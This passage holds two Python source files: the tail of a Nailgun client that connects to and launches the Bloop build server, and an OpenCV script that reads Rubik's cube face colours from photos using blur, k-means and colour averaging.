raise IOError("Async wrote less bytes!")
return nwrote
def select(self, timeout_secs):
start = monotonic_time_nanos()
timeout_nanos = timeout_secs * NSEC_PER_SEC
while True:
readable, exceptional = self.select_now()
if (
readable
or exceptional
or monotonic_time_nanos() - start > timeout_nanos
):
return readable, exceptional
def select_now(self):
available_total = wintypes.DWORD()
exceptional = not PeekNamedPipe(self.pipe, None, 0, None, available_total, None)
readable = available_total.value > 0
result = readable, exceptional
return result
class NailgunConnection(object):
"""Stateful object holding the connection to the Nailgun server."""
def __init__(
self,
server_name,
server_port=None,
stdin=sys.stdin,
stdout=sys.stdout,
stderr=sys.stderr,
cwd=None,
heartbeat_interval_sec=DEFAULT_HEARTBEAT_INTERVAL_SEC,
):
self.transport = make_nailgun_transport(server_name, server_port, cwd)
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.recv_flags = 0
self.send_flags = 0
self.header_buf = ctypes.create_string_buffer(CHUNK_HEADER_LEN)
self.buf = ctypes.create_string_buffer(BUFSIZE)
self.exit_code = None
self.shutdown_event = Event()
self.error_lock = RLock()
self.error = None
self.error_traceback = None
self.stdin_condition = Condition()
self.stdin_thread = Thread(target=stdin_thread_main, args=(self,))
self.stdin_thread.daemon = True
self.send_queue = Queue.Queue()
self.send_condition = Condition()
self.send_thread = Thread(target=send_thread_main, args=(self,))
self.send_thread.daemon = True
self.heartbeat_interval_sec = heartbeat_interval_sec
self.heartbeat_condition = Condition()
self.heartbeat_thread = None
if heartbeat_interval_sec > 0:
self.heartbeat_thread = Thread(target=heartbeat_thread_main, args=(self,))
self.heartbeat_thread.daemon = True
def send_command(
self, cmd, cmd_args=[], filearg=None, env=os.environ, cwd=os.getcwd()
):
"""
Sends the command and environment to the nailgun server, then loops forever
reading the response until the server sends an exit chunk.
Returns the exit value, or raises NailgunException on error.
"""
try:
return self._send_command_and_read_response(
cmd, cmd_args, filearg, env, cwd
)
except socket.error as e:
re_raise(
NailgunException(
"Server disconnected unexpectedly: {0}".format(e),
NailgunException.CONNECTION_BROKEN,
)
)
def _send_command_and_read_response(self, cmd, cmd_args, filearg, env, cwd):
self.stdin_thread.start()
self.send_thread.start()
try:
if filearg:
self._send_file_arg(filearg)
for cmd_arg in cmd_args:
self._send_chunk(cmd_arg, CHUNKTYPE_ARG)
self._send_env_var("NAILGUN_FILESEPARATOR", os.sep)
self._send_env_var("NAILGUN_PATHSEPARATOR", os.pathsep)
self._send_tty_format(self.stdin)
self._send_tty_format(self.stdout)
self._send_tty_format(self.stderr)
for k, v in env.items():
self._send_env_var(k, v)
self._send_chunk(cwd, CHUNKTYPE_DIR)
self._send_chunk(cmd, CHUNKTYPE_CMD)
if self.heartbeat_thread is not None:
self.heartbeat_thread.start()
while self.exit_code is None:
self._process_next_chunk()
finally:
self.shutdown_event.set()
with self.stdin_condition:
self.stdin_condition.notify()
with self.send_condition:
self.send_condition.notify()
if self.heartbeat_thread is not None:
with self.heartbeat_condition:
self.heartbeat_condition.notify()
self.heartbeat_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
self.stdin_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
self.send_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
return self.exit_code
def _process_next_chunk(self):
"""
Processes the next chunk from the nailgun server.
"""
readable, exceptional = self.transport.select(SELECT_MAX_BLOCK_TIME_SEC)
if readable:
self._process_nailgun_stream()
if exceptional:
raise NailgunException(
"Server disconnected in select", NailgunException.CONNECTION_BROKEN
)
# if daemon thread threw, rethrow here
if self.shutdown_event.is_set():
e = None
e_tb = None
with self.error_lock:
e = self.error
e_tb = self.error_traceback
if e is not None:
re_raise(e, e_tb)
def _send_chunk(self, buf, chunk_type):
"""
Send chunk to the server asynchronously
"""
self.send_queue.put((chunk_type, buf))
with self.send_condition:
self.send_condition.notify()
def _send_env_var(self, name, value):
"""
Sends an environment variable in KEY=VALUE format.
"""
self._send_chunk("=".join((name, value)), CHUNKTYPE_ENV)
def _send_tty_format(self, f):
"""
Sends a NAILGUN_TTY_# environment variable.
"""
if not f or not hasattr(f, "fileno"):
return
try:
fileno = f.fileno()
isatty = os.isatty(fileno)
self._send_env_var("NAILGUN_TTY_" + str(fileno), str(int(isatty)))
except UnsupportedOperation:
return
def _send_file_arg(self, filename):
"""
Sends the contents of a file to the server.
"""
with open(filename) as f:
while True:
num_bytes = f.readinto(self.buf)
if not num_bytes:
break
self._send_chunk(self.buf.raw[:num_bytes], CHUNKTYPE_LONGARG)
def _recv_to_fd(self, dest_file, num_bytes):
"""
Receives num_bytes bytes from the nailgun socket and copies them to the specified file
object. Used to route data to stdout or stderr on the client.
"""
bytes_read = 0
while bytes_read < num_bytes:
bytes_to_read = min(len(self.buf), num_bytes - bytes_read)
bytes_received = self.transport.recv_into(self.buf, bytes_to_read)
if dest_file:
dest_file.write(bytes_to_str(self.buf[:bytes_received]))
dest_file.flush()
bytes_read += bytes_received
def _recv_to_buffer(self, num_bytes, buf):
"""
Receives num_bytes from the nailgun socket and writes them into the specified buffer.
"""
# We'd love to use socket.recv_into() everywhere to avoid
# unnecessary copies, but we need to support Python 2.6. The
# only way to provide an offset to recv_into() is to use
# memoryview(), which doesn't exist until Python 2.7.
if HAS_MEMORYVIEW:
self._recv_into_memoryview(num_bytes, memoryview(buf))
else:
self._recv_to_buffer_with_copy(num_bytes, buf)
def _recv_into_memoryview(self, num_bytes, buf_view):
"""
Receives num_bytes from the nailgun socket and writes them into the specified memoryview
to avoid an extra copy.
"""
bytes_read = 0
while bytes_read < num_bytes:
bytes_received = self.transport.recv_into(
buf_view[bytes_read:], num_bytes - bytes_read
)
if not bytes_received:
raise NailgunException(
"Server unexpectedly disconnected in recv_into()",
NailgunException.CONNECTION_BROKEN,
)
bytes_read += bytes_received
def _recv_to_buffer_with_copy(self, num_bytes, buf):
"""
Receives num_bytes from the nailgun socket and writes them into the specified buffer.
"""
bytes_read = 0
while bytes_read < num_bytes:
recv_buf = self.transport.recv(num_bytes - bytes_read)
if not len(recv_buf):
raise NailgunException(
"Server unexpectedly disconnected in recv()",
NailgunException.CONNECTION_BROKEN,
)
buf[bytes_read : bytes_read + len(recv_buf)] = recv_buf
bytes_read += len(recv_buf)
def _process_exit(self, exit_len):
"""
Receives an exit code from the nailgun server and sets nailgun_connection.exit_code
to indicate the client should exit.
"""
num_bytes = min(len(self.buf), exit_len)
self._recv_to_buffer(num_bytes, self.buf)
self.exit_code = int(self.buf.raw[:num_bytes])
def _send_heartbeat(self):
"""
Sends a heartbeat to the nailgun server to indicate the client is still alive.
"""
self._send_chunk("", CHUNKTYPE_HEARTBEAT)
def _process_nailgun_stream(self):
"""
Processes a single chunk from the nailgun server.
"""
self._recv_to_buffer(len(self.header_buf), self.header_buf)
(chunk_len, chunk_type) = struct.unpack_from(">ic", self.header_buf.raw)
if chunk_type == CHUNKTYPE_STDOUT:
self._recv_to_fd(self.stdout, chunk_len)
elif chunk_type == CHUNKTYPE_STDERR:
self._recv_to_fd(self.stderr, chunk_len)
elif chunk_type == CHUNKTYPE_EXIT:
self._process_exit(chunk_len)
elif chunk_type == CHUNKTYPE_SENDINPUT:
# signal stdin thread to get and send more data
with self.stdin_condition:
self.stdin_condition.notify()
else:
raise NailgunException(
"Unexpected chunk type: {0}".format(chunk_type),
NailgunException.UNEXPECTED_CHUNKTYPE,
)
def wait_termination(self, timeout):
"""
Wait for shutdown event to be signalled within specified interval
Return True if termination was signalled, False otherwise
"""
wait_time = timeout
start = monotonic_time_nanos()
with self.send_condition:
while True:
if self.shutdown_event.is_set():
return True
self.send_condition.wait(wait_time)
elapsed = (monotonic_time_nanos() - start) * 1.0 / NSEC_PER_SEC
wait_time = timeout - elapsed
if wait_time <= 0:
return False
return False
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
try:
self.transport.close()
except socket.error:
pass
def monotonic_time_nanos():
"""Returns a monotonically-increasing timestamp value in nanoseconds.
The epoch of the return value is undefined. To use this, you must call
it more than once and calculate the delta between two calls.
"""
# This function should be overwritten below on supported platforms.
raise Exception("Unsupported platform: " + platform.system())
if platform.system() == "Linux":
# From <linux/time.h>, available since 2.6.28 (released 24-Dec-2008).
CLOCK_MONOTONIC_RAW = 4
librt = ctypes.CDLL("librt.so.1", use_errno=True)
clock_gettime = librt.clock_gettime
class struct_timespec(ctypes.Structure):
_fields_ = [("tv_sec", ctypes.c_long), ("tv_nsec", ctypes.c_long)]
clock_gettime.argtypes = [ctypes.c_int, ctypes.POINTER(struct_timespec)]
def _monotonic_time_nanos_linux():
t = struct_timespec()
clock_gettime(CLOCK_MONOTONIC_RAW, ctypes.byref(t))
return t.tv_sec * NSEC_PER_SEC + t.tv_nsec
monotonic_time_nanos = _monotonic_time_nanos_linux
elif platform.system() == "Darwin":
# From <mach/mach_time.h>
KERN_SUCCESS = 0
libSystem = ctypes.CDLL("/usr/lib/libSystem.dylib", use_errno=True)
mach_timebase_info = libSystem.mach_timebase_info
class struct_mach_timebase_info(ctypes.Structure):
_fields_ = [("numer", ctypes.c_uint32), ("denom", ctypes.c_uint32)]
mach_timebase_info.argtypes = [ctypes.POINTER(struct_mach_timebase_info)]
mach_ti = struct_mach_timebase_info()
ret = mach_timebase_info(ctypes.byref(mach_ti))
if ret != KERN_SUCCESS:
raise Exception("Could not get mach_timebase_info, error: " + str(ret))
mach_absolute_time = libSystem.mach_absolute_time
mach_absolute_time.restype = ctypes.c_uint64
def _monotonic_time_nanos_darwin():
return (mach_absolute_time() * mach_ti.numer) / mach_ti.denom
monotonic_time_nanos = _monotonic_time_nanos_darwin
elif platform.system() == "Windows":
# From <Winbase.h>
perf_frequency = ctypes.c_uint64()
ctypes.windll.kernel32.QueryPerformanceFrequency(ctypes.byref(perf_frequency))
def _monotonic_time_nanos_windows():
perf_counter = ctypes.c_uint64()
ctypes.windll.kernel32.QueryPerformanceCounter(ctypes.byref(perf_counter))
return perf_counter.value * NSEC_PER_SEC / perf_frequency.value
monotonic_time_nanos = _monotonic_time_nanos_windows
elif sys.platform == "cygwin":
try:
k32 = ctypes.CDLL("Kernel32", use_errno=True)
except OSError:
k32 = ctypes.CDLL("Kernel32.dll", use_errno=True)
perf_frequency = ctypes.c_uint64()
k32.QueryPerformanceFrequency(ctypes.byref(perf_frequency))
def _monotonic_time_nanos_cygwin():
perf_counter = ctypes.c_uint64()
k32.QueryPerformanceCounter(ctypes.byref(perf_counter))
return perf_counter.value * NSEC_PER_SEC / perf_frequency.value
monotonic_time_nanos = _monotonic_time_nanos_cygwin
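# Illustrative sketch (not part of the original client): monotonic_time_nanos() has an
# undefined epoch, so it is only meaningful as a delta between two calls, as done in
# WindowsNamedPipeTransport.select() and NailgunConnection.wait_termination() above.
def _elapsed_seconds_example(fn):
    start = monotonic_time_nanos()
    fn()
    return (monotonic_time_nanos() - start) * 1.0 / NSEC_PER_SEC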
def send_thread_main(conn):
"""
Sending thread worker function
Waits for data and transmits it to server
"""
try:
header_buf = ctypes.create_string_buffer(CHUNK_HEADER_LEN)
while True:
connection_error = None
while not conn.send_queue.empty():
# only this thread can deplete the queue, so it is safe to use blocking get()
(chunk_type, buf) = conn.send_queue.get()
bbuf = to_bytes(buf)
byte_count=len(bbuf)
struct.pack_into(">ic", header_buf, 0, byte_count, chunk_type)
# these chunk types are not required for server to accept and process and server may terminate
# any time without waiting for them
is_required = chunk_type not in (
CHUNKTYPE_HEARTBEAT,
CHUNKTYPE_STDIN,
CHUNKTYPE_STDIN_EOF,
)
try:
conn.transport.sendall(header_buf.raw)
conn.transport.sendall(bbuf)
except socket.error as e:
# The server may send termination signal and close the socket immediately; attempt to write
# to such a socket (i.e. heartbeats) results in an error (SIGPIPE)
# Nailgun protocol is not duplex so the server does not wait on client to acknowledge
# We catch an exception and ignore it if termination has happened shortly afterwards
if not is_required and conn.wait_termination(
SEND_THREAD_WAIT_TERMINATION_SEC
):
return
raise
with conn.send_condition:
if conn.shutdown_event.is_set():
return
if not conn.send_queue.empty():
continue
conn.send_condition.wait()
if conn.shutdown_event.is_set():
return
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
def stdin_thread_main(conn):
"""
Stdin thread reading worker function
If stdin is available, read it to internal buffer and send to server
"""
try:
eof = False
while True:
# wait for signal to read new line from stdin or shutdown
# we do not start reading from stdin before server actually requests that
with conn.stdin_condition:
if conn.shutdown_event.is_set():
return
conn.stdin_condition.wait()
if conn.shutdown_event.is_set():
return
if not conn.stdin or eof:
                conn._send_chunk("", CHUNKTYPE_STDIN_EOF)  # buf may be undefined here; the EOF chunk carries no payload
continue
buf = conn.stdin.readline()
if buf == "":
eof = True
conn._send_chunk(buf, CHUNKTYPE_STDIN_EOF)
continue
conn._send_chunk(buf, CHUNKTYPE_STDIN)
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
def heartbeat_thread_main(conn):
"""
Heartbeat thread worker function
Periodically sends heartbeats to server as long as command is running
"""
try:
while True:
with conn.heartbeat_condition:
if conn.shutdown_event.is_set():
return
conn.heartbeat_condition.wait(conn.heartbeat_interval_sec)
if conn.shutdown_event.is_set():
return
conn._send_heartbeat()
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
def make_nailgun_transport(nailgun_server, nailgun_port=None, cwd=None):
"""
Creates and returns a socket connection to the nailgun server.
"""
transport = None
if nailgun_server.startswith("local:"):
if platform.system() == "Windows":
pipe_addr = nailgun_server[6:]
transport = WindowsNamedPipeTransport(pipe_addr)
else:
try:
s = socket.socket(socket.AF_UNIX)
except socket.error as msg:
re_raise(
NailgunException(
"Could not create local socket connection to server: {0}".format(
msg
),
NailgunException.SOCKET_FAILED,
)
)
socket_addr = nailgun_server[6:]
prev_cwd = os.getcwd()
try:
if cwd is not None:
os.chdir(cwd)
s.connect(socket_addr)
transport = UnixTransport(s)
except socket.error as msg:
re_raise(
NailgunException(
"Could not connect to local server at {0}: {1}".format(
socket_addr, msg
),
NailgunException.CONNECT_FAILED,
)
)
finally:
if cwd is not None:
os.chdir(prev_cwd)
else:
socket_addr = nailgun_server
socket_family = socket.AF_UNSPEC
for (af, socktype, proto, _, sa) in socket.getaddrinfo(
nailgun_server, nailgun_port, socket.AF_UNSPEC, socket.SOCK_STREAM
):
try:
s = socket.socket(af, socktype, proto)
except socket.error as msg:
s = None
continue
try:
s.connect(sa)
transport = UnixTransport(s)
except socket.error as msg:
s.close()
s = None
continue
break
if transport is None:
raise NailgunException(
"Could not connect to server {0}:{1}".format(nailgun_server, nailgun_port),
NailgunException.CONNECT_FAILED,
)
return transport
if is_py2:
exec(
'''
def re_raise(ex, ex_trace = None):
"""
Throw ex and preserve stack trace of original exception if we run on Python 2
"""
if ex_trace is None:
ex_trace = sys.exc_info()[2]
raise ex, None, ex_trace
'''
)
else:
def re_raise(ex, ex_trace=None):
"""
        Re-raise ex; on Python 3 the original traceback is already attached to the exception
"""
raise ex
def main():
"""
Main entry point to the nailgun client.
"""
default_nailgun_server = os.environ.get("NAILGUN_SERVER", "127.0.0.1")
default_nailgun_port = int(os.environ.get("NAILGUN_PORT", NAILGUN_PORT_DEFAULT))
parser = optparse.OptionParser(add_help_option=False, usage="%prog [options] cmd arg1 arg2 ...")
parser.disable_interspersed_args()
parser.add_option("--nailgun-server", default=default_nailgun_server)
parser.add_option("--nailgun-port", type="int", default=default_nailgun_port)
parser.add_option("--nailgun-filearg")
parser.add_option("--nailgun-showversion", action="store_true")
parser.add_option("--nailgun-help", action="help")
parser.add_option('-h', '--help', action='store_true', dest='help_set')
parser.add_option('--server-location', type='string', dest='server_location')
(options, args) = parser.parse_args()
if options.nailgun_showversion:
print("NailGun client version " + NAILGUN_VERSION)
if len(args):
cmd = args.pop(0)
else:
cmd = os.path.basename(sys.argv[0])
if options.help_set and not args:
cmd = "help"
cmd_args = []
else:
# Pass any remaining command line arguments to the server.
cmd_args = args
    # The command we need to execute gets written to the file passed via the
    # --out-file parameter. If the user hasn't specified one, we inject a
    # temporary file of our own.
out_file_temp = tempfile.NamedTemporaryFile()
out_file_path = out_file_temp.name
if cmd == "console":
try:
index = cmd_args.index("--out-file")
        except ValueError:
            index = -1
        if index != -1:
            out_file_path = cmd_args[index + 1]
        else:
            cmd_args = [cmd_args[0], "--out-file", out_file_path] + cmd_args[1:]
if cmd == "server":
nailgun_port = options.nailgun_port
try:
# Pick user-defined nailgun port after `server`
for arg in cmd_args:
if not arg.startswith("-"):
try:
nailgun_port = int(arg)
break
except ValueError:
print("Argument after `bloop server` is not a port " + str(arg) + ".")
if nailgun_port == options.nailgun_port:
print("Defaulting on nailgun port " + str(nailgun_port))
with NailgunConnection(
options.nailgun_server, server_port=nailgun_port
) as c:
print("Check if server is alive or not...")
exit_code = c.send_command("about", filearg=options.nailgun_filearg)
print("-------------------------------------------------------------------")
print("A bloop server is already running in port " + str(nailgun_port) + ".")
print("")
print(" - Do you want to spawn a bloop server in another port?")
print(" Run `bloop server $NAILGUN_PORT`.")
print(" - Do you want to kill the running server?")
print(" Run `bloop ng-stop --nailgun-port $NAILGUN_PORT` or `bloop ng-stop` for short.")
print("")
print("Questions? Reach us at https://gitter.im/scalacenter/bloop")
sys.exit(exit_code)
except NailgunException as e:
print("There is no server running at port " + str(nailgun_port))
print("Starting the bloop server... this may take a few seconds")
basedir = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0])))
server_location = os.path.join(basedir, "blp-server")
if not os.path.isfile(server_location):
if options.server_location:
server_location = options.server_location
else:
print("Bloop server could not be located in %s." % server_location)
print("Pass in the location with `--server-location` before the `server` command.")
sys.exit(1)
# Read jvm options from the .jvmopts file
jvmopts_file = os.path.join(basedir, ".jvmopts")
jvm_options_from_file = []
if os.path.isfile(jvmopts_file):
with open(jvmopts_file, "r") as jvmopts:
lines = jvmopts.read().splitlines()
for line in lines:
if line.startswith("-J"):
jvm_options_from_file.append(line)
else:
jvm_options_from_file.append("-J" + line)
try:
jvm_options_no_prefix = []
server_args = []
for jvm_arg in jvm_options_from_file:
if jvm_arg.startswith("-J"):
# Remove prefix -J from argument
jvm_options_no_prefix.append(jvm_arg[2:])
for arg in cmd_args:
if arg.startswith("-J"):
# Remove prefix -J from argument
jvm_options_no_prefix.append(arg[2:])
else:
server_args.append(arg)
            # Works on Windows and in installations that ship a jar instead of a script
print("Running " + server_location + " as a jar...")
java_cmd = ["java"] + jvm_options_no_prefix + ["-jar", server_location] + server_args
print("Shelling out with '" + str(java_cmd) + "' ...")
check_call(java_cmd)
except CalledProcessError as e:
            # Works on systems such as Mac OS or Nix in which blp-server is a script
try:
jvm_options_with_prefix = [ "-J" + opt for opt in jvm_options_no_prefix ]
print("Running " + server_location + " as a script...")
if platform.system() == "Windows":
cmd = ["cmd.exe", "/C", server_location] + cmd_args + jvm_options_with_prefix
print("Shelling out in Windows with " + str(cmd))
check_call(cmd)
else:
cmd = ["sh", server_location] + cmd_args + jvm_options_with_prefix
print("Shelling out in Unix system with " + str(cmd))
check_call(cmd)
except CalledProcessError as e2:
print("Bloop server in %s failed to run." % server_location)
print("First invocation attempt: %s" % e.cmd)
print("-> Return code: %d" % e.returncode)
print("Second invocation attempt: %s" % e2.cmd)
print("-> Return code: %d" % e2.returncode)
# Only use the return code of the first attempt
sys.exit(e.returncode)
except KeyboardInterrupt as e:
sys.exit(0)
try:
with NailgunConnection(
options.nailgun_server, server_port=options.nailgun_port
) as c:
if cmd == "repl":
sys.stderr.write("Did you mean `bloop console`?\n")
sys.exit(1)
exit_code = c.send_command(cmd, cmd_args, options.nailgun_filearg)
if cmd == "help":
sys.stdout.write("Type `--nailgun-help` for help on the Nailgun CLI tool.\n")
            # The user might have specified a REPL to use; we fall back to
            # ammonite as the default if none is specified.
try:
repl_kind_index = cmd_args.index("--repl") + 1
repl_kind = cmd_args[repl_kind_index]
except:
repl_kind = "ammonite"
if cmd == "console" and repl_kind == "ammonite" and exit_code == 0:
with open(out_file_path, 'r') as f:
try:
repl_cmd = f.read().split(" ")
basedir = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0])))
coursier_location = os.path.join(basedir, "blp-coursier")
if (os.path.isfile(coursier_location)):
repl_cmd[0] = coursier_location
if platform.system() == "Windows":
cmd = ["cmd.exe", "/C"] + repl_cmd
# print("Running console in Windows with " + " ".join(cmd))
check_call(cmd)
else:
cmd = ["sh"] + repl_cmd
# print("Running console in Unix system with " + " ".join(cmd))
check_call(cmd)
except CalledProcessError as e:
print("Bloop console failed to run!")
print("-> Command: %s" % e.cmd)
print("-> Return code: %d" % e.returncode)
sys.exit(exit_code)
except NailgunException as e:
sys.stderr.write(str(e))
if "Could not connect to" in str(e):
sys.stderr.write("\n\n")
sys.stderr.write("Have you forgotten to start bloop's server? Run it with `bloop server`.\n")
sys.stderr.write("Check our usage instructions in https://scalacenter.github.io/bloop/\n")
if cmd == "help":
sys.stdout.write("Type `--nailgun-help` for help on the Nailgun CLI tool.\n")
sys.exit(e.code)
except KeyboardInterrupt as e:
pass
if __name__ == "__main__":
main()
|
getdata.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : getdata.py
@Time : 2020/02/14 18:16:06
@Author : Gui XiaoMo
@Version : 1.0
@Contact : 2572225959@qq.com
@License : (C)Copyright 2020-2021, QINGDAO-QUST
@Desc : None
'''
# here put the import lib
import os
import cv2 as cv
import numpy as np
import time
import json
import threading
from queue import Queue
import sys
picture_path='C:/Users/Administrator/Desktop/1/'
picture_number=0 # index of the current picture
num=0 # how many pictures were processed successfully
# HSV ranges for the Rubik's cube colors
greenLower = (46, 133, 46)
greenUpper = (85, 255, 255)
redLower = (150, 100, 6)
redUpper = (185, 255, 255)
yellowLower = (21, 84, 46)
yellowUpper = (64, 255, 255)
orangeLower = (2, 150, 100)
orangeUpper = (15, 255, 255)
whiteLower = (0, 0, 146) # gray
whiteUpper = (180, 78, 255)
blueLower = (88, 143, 46)
blueUpper = (120, 255, 255)
Side_length=54
Outer_frame=[[10, 10], [85, 10], [160, 10],
[10, 85], [85, 85], [160, 85],
[10, 160], [85, 160], [160, 160]
]
listnet=[]
listall=[]
listhsv=[]
listrgb=[]
class MyEncoder(json.JSONEncoder):
    def default(self, obj):
        if isinstance(obj, np.integer):
            return int(obj)
        elif isinstance(obj, np.floating):
            return float(obj)
        elif isinstance(obj, np.ndarray):
            return obj.tolist()
        else:
            return super(MyEncoder, self).default(obj)
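# MyEncoder lets json.dumps serialize numpy scalar and array types; a minimal
# usage sketch (hypothetical data, not from this script):
#
#     json.dumps({"hsv": np.array([21, 84, 46])}, cls=MyEncoder)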
# build the path of picture i (returns the picture path)
def read_picture(i):
path=picture_path+'huanyuan{0}.jpg'.format(i)
print(path)
return(path)
def indextocolor(index):
color=()
if (index==0):
color=(0, 0, 255)
if (index==1):
color=(255, 0, 0)
if (index==2):
color=(0, 255, 255)
if (index==3):
color=(0, 165, 255)
if (index==4):
color=(0, 255, 0)
if (index==5):
color=(255, 255, 255)
return (color)
def draw_rectangle(image,color,i):
x=Outer_frame[i][0]
y=Outer_frame[i][1]
x1=Outer_frame[i][0]+Side_length
y1=Outer_frame[i][1]+Side_length
cv.rectangle(image,(x,y),(x1,y1),color,-1)
def get_averageBGR(image,x,y):
img = cv.cvtColor(image,cv.COLOR_HSV2RGB)
img=img[x+20:x+45,y+20:y+45]
per_image_Rmean = []
per_image_Gmean = []
per_image_Bmean = []
list1=[]
per_image_Bmean.append(np.mean(img[:,:,0]))
per_image_Gmean.append(np.mean(img[:,:,1]))
per_image_Rmean.append(np.mean(img[:,:,2]))
R_mean = np.mean(per_image_Rmean)
G_mean = np.mean(per_image_Gmean)
B_mean = np.mean(per_image_Bmean)
list1.append(R_mean)
list1.append(G_mean)
list1.append(B_mean)
return (list1)
def get_averageHSV(img,x,y):
hsv=[]
list1=[]
h=s=v=0
image1=img[x+20:x+45,y+20:y+45]
hsv= cv.cvtColor(image1,cv.COLOR_BGR2HSV)
width = hsv.shape[0]
height= hsv.shape[1]
for index1 in range (width):
for index2 in range (height):
h=h+ hsv[index1,index2,0]
s=s+ hsv[index1,index2,1]
v=v+ hsv[index1,index2,2]
aveh=h//(width*height)
aves=s//(width*height)
avev=v//(width*height)
list1.append(aveh)
list1.append(aves)
list1.append(avev)
return (list1)
def average(img):
    # color image histogram equalization: equalize the luma channel in YUV space
image_yuv = cv.cvtColor(img,cv.COLOR_BGR2YUV)
    #histogram equalization
image_yuv[:,:,0] = cv.equalizeHist(image_yuv[:,:,0])
    #show the result
output = cv.cvtColor(image_yuv,cv.COLOR_YUV2BGR)
cv.imshow('HistEqualize',output)
return (output)
# img=cv.cvtColor(img,cv.COLOR_BGR2HSV)
# (b, g, r) = cv.split(img)
# bH = cv.equalizeHist(b)
# gH = cv.equalizeHist(g)
# rH = cv.equalizeHist(r)
# # 合并每一个通道
# result = cv.merge((bH, gH, rH))
# cv.imshow("直方图均衡化", result)
def balance(img_input):
    # perfect reflective white balance
    # STEP 1: compute R+G+B for every pixel
    # STEP 2: take the top Ratio% of the R+G+B values as the reference threshold T
    # STEP 3: average the R/G/B components of all pixels whose R+G+B exceeds T
    # STEP 4: rescale every pixel into [0, 255]
    # Sensitive to the choice of ratio; works poorly when the brightest region is not white.
    # :param img_input: image data read by cv2.imread
    # :return: the white-balanced image
img = img_input.copy()
b, g, r = cv.split(img)
m, n, t = img.shape
sum_ = np.zeros(b.shape)
for i in range(m):
for j in range(n):
sum_[i][j] = int(b[i][j]) + int(g[i][j]) + int(r[i][j])
hists, bins = np.histogram(sum_.flatten(), 766, [0, 766])
Y = 765
num, key = 0, 0
ratio = 0.01
while Y >= 0:
num += hists[Y]
if num > m * n * ratio / 100:
key = Y
break
Y = Y - 1
sum_b, sum_g, sum_r = 0, 0, 0
time = 0
for i in range(m):
for j in range(n):
if sum_[i][j] >= key:
sum_b += b[i][j]
sum_g += g[i][j]
sum_r += r[i][j]
time = time + 1
avg_b = sum_b / time
avg_g = sum_g / time
avg_r = sum_r / time
maxvalue = float(np.max(img))
# maxvalue = 255
for i in range(m):
for j in range(n):
b = int(img[i][j][0]) * maxvalue / int(avg_b)
g = int(img[i][j][1]) * maxvalue / int(avg_g)
r = int(img[i][j][2]) * maxvalue / int(avg_r)
if b > 255:
b = 255
if b < 0:
b = 0
if g > 255:
g = 255
if g < 0:
g = 0
if r > 255:
r = 255
if r < 0:
r = 0
img[i][j][0] = b
img[i][j][1] = g
img[i][j][2] = r
return (img)
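# Note: the per-pixel Python loops in balance() are slow for large images; the
# final scaling pass could presumably be vectorized with numpy along these
# lines (untested sketch using the same locals):
#
#     scaled = img.astype(np.float64) * maxvalue / np.array([avg_b, avg_g, avg_r])
#     img = np.clip(scaled, 0, 255).astype(np.uint8)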
def gaussi_blur(img):
blur = cv.GaussianBlur(img,(5,5),0)
#cv.imshow("gaussian",blur)
return (blur)
def k_means(img):
Z = img.reshape((-1,3))
Z = np.float32(Z)
# convert to np.float32
# define criteria, number of clusters(K) and apply kmeans()
criteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 10, 1.0)
K = 8
ret,label,center=cv.kmeans(Z,K,None,criteria,10,cv.KMEANS_RANDOM_CENTERS)
# Now convert back into uint8, and make original image
center = np.uint8(center)
res = center[label.flatten()]
res2 = res.reshape((img.shape))
#cv.imshow("k_means",res2)
return (res2)
'''
image= cv.imread("huanyuan32.jpg")
cv.imshow("image",image)
img1=gaussi_blur(image)
img2=k_means(img1)
cv.imwrite("svmwo1.jpg",img2)
img3=balance(img2)
cv.imshow("balance",img3)
img4=average(img3)
#cv.imwrite("svmwo5.jpg",img4)
'''
def main(src):
img1=gaussi_blur(src)
img2=k_means(img1)
for x,y in (Outer_frame):
listhsv=get_averageHSV(img2,x,y)
listrgb=get_averageBGR(img2,x,y)
listrgb = list(map(int,listrgb))
listnet=listhsv+listrgb
listall.append(listnet)
#print(listall)
######################### multithreading experiment #############################################
cube_list_hsv=[[] for _ in range (6)]
cube_list_bgr=[[] for _ in range (6)]
cube_list_all=[[] for _ in range (6)]
cube_list_net=[[] for _ in range (6)]
dict_data={"1":cube_list_all[0],'2':cube_list_all[1],'3':cube_list_all[2],
'4':cube_list_all[3],'5':cube_list_all[4],'6':cube_list_all[5]
}
#### recognize the 6 cube faces in separate threads
def job1():
for i in range (1,29):
path1 = read_picture(i)
print (path1,end='\n')
cube_list_hsv[0]=[]
cube_list_bgr[0]=[]
cube_list_net[0]=[]
src1=cv.imread(path1)
# if not src1:
# print('error reading picture')
# sys.exit()
cube1_img1=gaussi_blur(src1)
cube1_img2=k_means(cube1_img1)
for x,y in (Outer_frame):
cube_list_hsv[0]=get_averageHSV(cube1_img2,x,y)
cube_list_bgr[0]=get_averageBGR(cube1_img2,x,y)
cube_list_bgr[0]=list(map(int,cube_list_bgr[0]))
cube_list_net[0]=cube_list_hsv[0]+cube_list_bgr[0]
cube_list_all[0].append(cube_list_net[0])
#q.put(cube_list_all[0])
def job2():
for i in range (29,63):
path2 = read_picture(i)
# print (path1,end='\n')
cube_list_hsv[1]=[]
cube_list_bgr[1]=[]
cube_list_net[1]=[]
src1=cv.imread(path2)
# if not src1:
# print('error reading picture')
# sys.exit()
cube1_img1=gaussi_blur(src1)
cube1_img2=k_means(cube1_img1)
for x,y in (Outer_frame):
cube_list_hsv[1]=get_averageHSV(cube1_img2,x,y)
cube_list_bgr[1]=get_averageBGR(cube1_img2,x,y)
cube_list_bgr[1]=list(map(int,cube_list_bgr[1]))
cube_list_net[1]=cube_list_hsv[1]+cube_list_bgr[1]
